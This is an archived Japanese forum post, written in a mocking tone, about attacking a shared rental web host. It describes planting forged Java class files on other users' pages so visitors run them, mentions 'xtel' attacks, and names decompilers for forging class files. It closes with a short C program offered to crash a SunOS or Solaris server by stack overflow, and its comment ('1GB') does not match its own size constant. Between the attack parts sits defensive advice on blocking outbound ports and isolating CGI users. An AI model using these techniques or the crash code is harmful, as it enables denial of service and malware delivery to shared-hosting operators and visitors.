戻る　※過去ログ・転載/引用専門です。

　　　■　www.rental-web.comの うひーひひひ 他のページに偽物でっち上げて、ひーひひひ
　　　　　偽のＣｌａｓｓ Ｆｉｌｅを いひーひひひ 哀れな方々にごちそうするという手が簡単で ひーひひひ。
　　　　　Ｃｌａｓｓ Ｆｉｌｅを実行させてやるだけで良い。 セキュリティモデル的に これは防げない。
　　　　　ｘｔｅｌ 攻撃も同様に可能。 アカウント1個 ぶっ飛ばす覚悟でやるんなら この程度。ひひっ

　　　　　Javaの 逆コンパイラは mochaが有名だが、最近どこにいったか わからない。ひひっ
　　　　　KlassMaster もいい感じ。遅いけどね。 ひーひひひ
　　　　　とりあえず、ふつー に見にいって class ファイル引っこ抜いてきて 解析して 偽物
　　　　　でっち上げる用途には KlassMaster かな。そこまでして 壊す理由なんて ないん
　　　　　だろうけどね。CGI を利用者に開放するというのは、根本的に ガタガタなのよん。
　　　　　内側からの port 80、8080、10080、8000、3126 などへの TCP Connnection を
　　　　　全部塞ぐように設定しないと、潜在的な迷惑サイトへの道が待ってるですな。
　　　　　もちろん、21,23,25 他もね。 外から見える Webサーバ自体は Delegateなどで
　　　　　隔離病棟への中継を行わせて、外向けWebと 隔離病棟間の Connectionは片側
　　　　　一方向（もちろん、Web＞隔離病棟）にしないと、隔離病棟から 病人達が他のサイト
　　　　　を 銃で撃ったり、他色々。 ひひっ
　　　　　一台で構成できない事も無いけど、かなり面倒ね。 うひーひひひ

　　　■　ＣＧＩを開放しているサーバでＣコンパイラ使える場合なら・・・

　　　　　#define MAX_SIZE 137438953472
　　　　　main()
　　　　　 {
　　　　　　　int i;
　　　　　　　double a;
　　　　　　　double b[MAX_SIZE]; /* 1GBのスタックを確保 */

　　　　　　　/* このループを実行すれば、サーバのＯＳがSunOSまたはSolaris */
　　　　　　　/* ならスタック・オバーフローでＯＳを道連れにぶっ飛ばせます */
　　　　　　　/* ダメだったら、MAX_SIZEを大きくすればいいよ。 */

　　　　　　　 for (i=0; i<MAX_SIZE;i++) {
　　　　　　　　　a = b[i];
　　　　　　　 }
　　　　　}